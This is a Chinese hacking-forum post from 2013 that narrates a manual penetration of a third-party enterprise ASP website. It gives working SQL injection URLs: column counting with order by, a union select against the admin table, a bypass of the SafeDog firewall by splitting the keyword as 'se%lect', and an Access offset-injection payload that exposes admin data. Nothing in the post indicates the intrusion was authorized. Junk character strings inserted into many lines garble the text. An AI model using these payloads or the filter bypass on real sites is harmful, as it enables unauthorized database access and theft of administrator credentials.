找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2100|回复: 0
打印 上一主题 下一主题

一次手工渗透突破安全狗防御+ACCESS偏移注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:49:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
打开网站,一个企业站。
% o( ?$ ?3 }6 ^, B" T
5 y' z! e/ @! `0 _( B: w! p- b
. o1 L/ G: K* M, D2 `; D& ?顺手加个admin
( k6 a: g& {# l$ u3 v  `3 P' w+ a, Z5 u% j, a% I3 A

: E: R/ n  O- ~默认后台。+ p0 e0 l. a2 R5 B
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​
; L  [) g) Y; W. N& x2 R
) B& f1 x! m: l5 _( [2 [) j2 x* a; s+ P2 y% y8 u. u" J9 K  k
0 D1 O# g' c1 _' T+ A
所以就不用御剑扫了,待会直接封IP。! Q  W! Z7 g+ @3 k- |5 H( L# S

# m* e. P; n0 N2 U用order by语句判断是否存在注入。
6 a, E7 M6 E- P; ghttp://www.xxx.com /product_show.asp?id=997 order by 1, L  V9 J! R- d; J
http://www.xxx.com /product_show.asp?id=997 order by 1007 h+ c3 E9 K/ l0 u8 D
现在存在注入,经测试后发现是9个字段。0 c! K# O; u" `' ^! y, n2 @- T7 f
3 z7 o& ~: W3 R7 r. @' E
接下来进行联合查询,猜是否存在admin表。9 w+ @! A3 w/ O* s5 @8 C
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​! _% W+ M) M: {' M

) L& U6 q. @/ K: p8 D+ L/ a2 W: G; ^0 h3 \% a

* D% h; h- t+ I6 N7 n在select中间加个%,se%lect绕过安全狗。: p( L5 l9 P0 g3 u$ c

" p" w+ \* @9 w0 O
# i0 ], d5 z) T& u7 `发现存在admin表,然后开始手工猜常用的字段。  [9 X( Z5 k8 N- h4 \
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
% t, q" t- g. }7 V5 N- ` " y3 j$ J) `" w) `' n' Z
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。$ ?+ W( Q' F/ z: x

5 O. j% x: d2 X0 `科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
3 W1 y7 O( t% P8 P# Ahttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin: ]8 r: m, q: e' C4 ^6 V  \  @
好了,敏感内容出显了。​2 h9 _  L, I- H- F- j- Q$ H: X/ Y

$ n4 U  h2 o  A2 r; l+ y! ^9 b8 ~/ Q* f: x2 g- T3 r) l9 D

9 |, K# s, w0 {9 N: R7 n, U
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表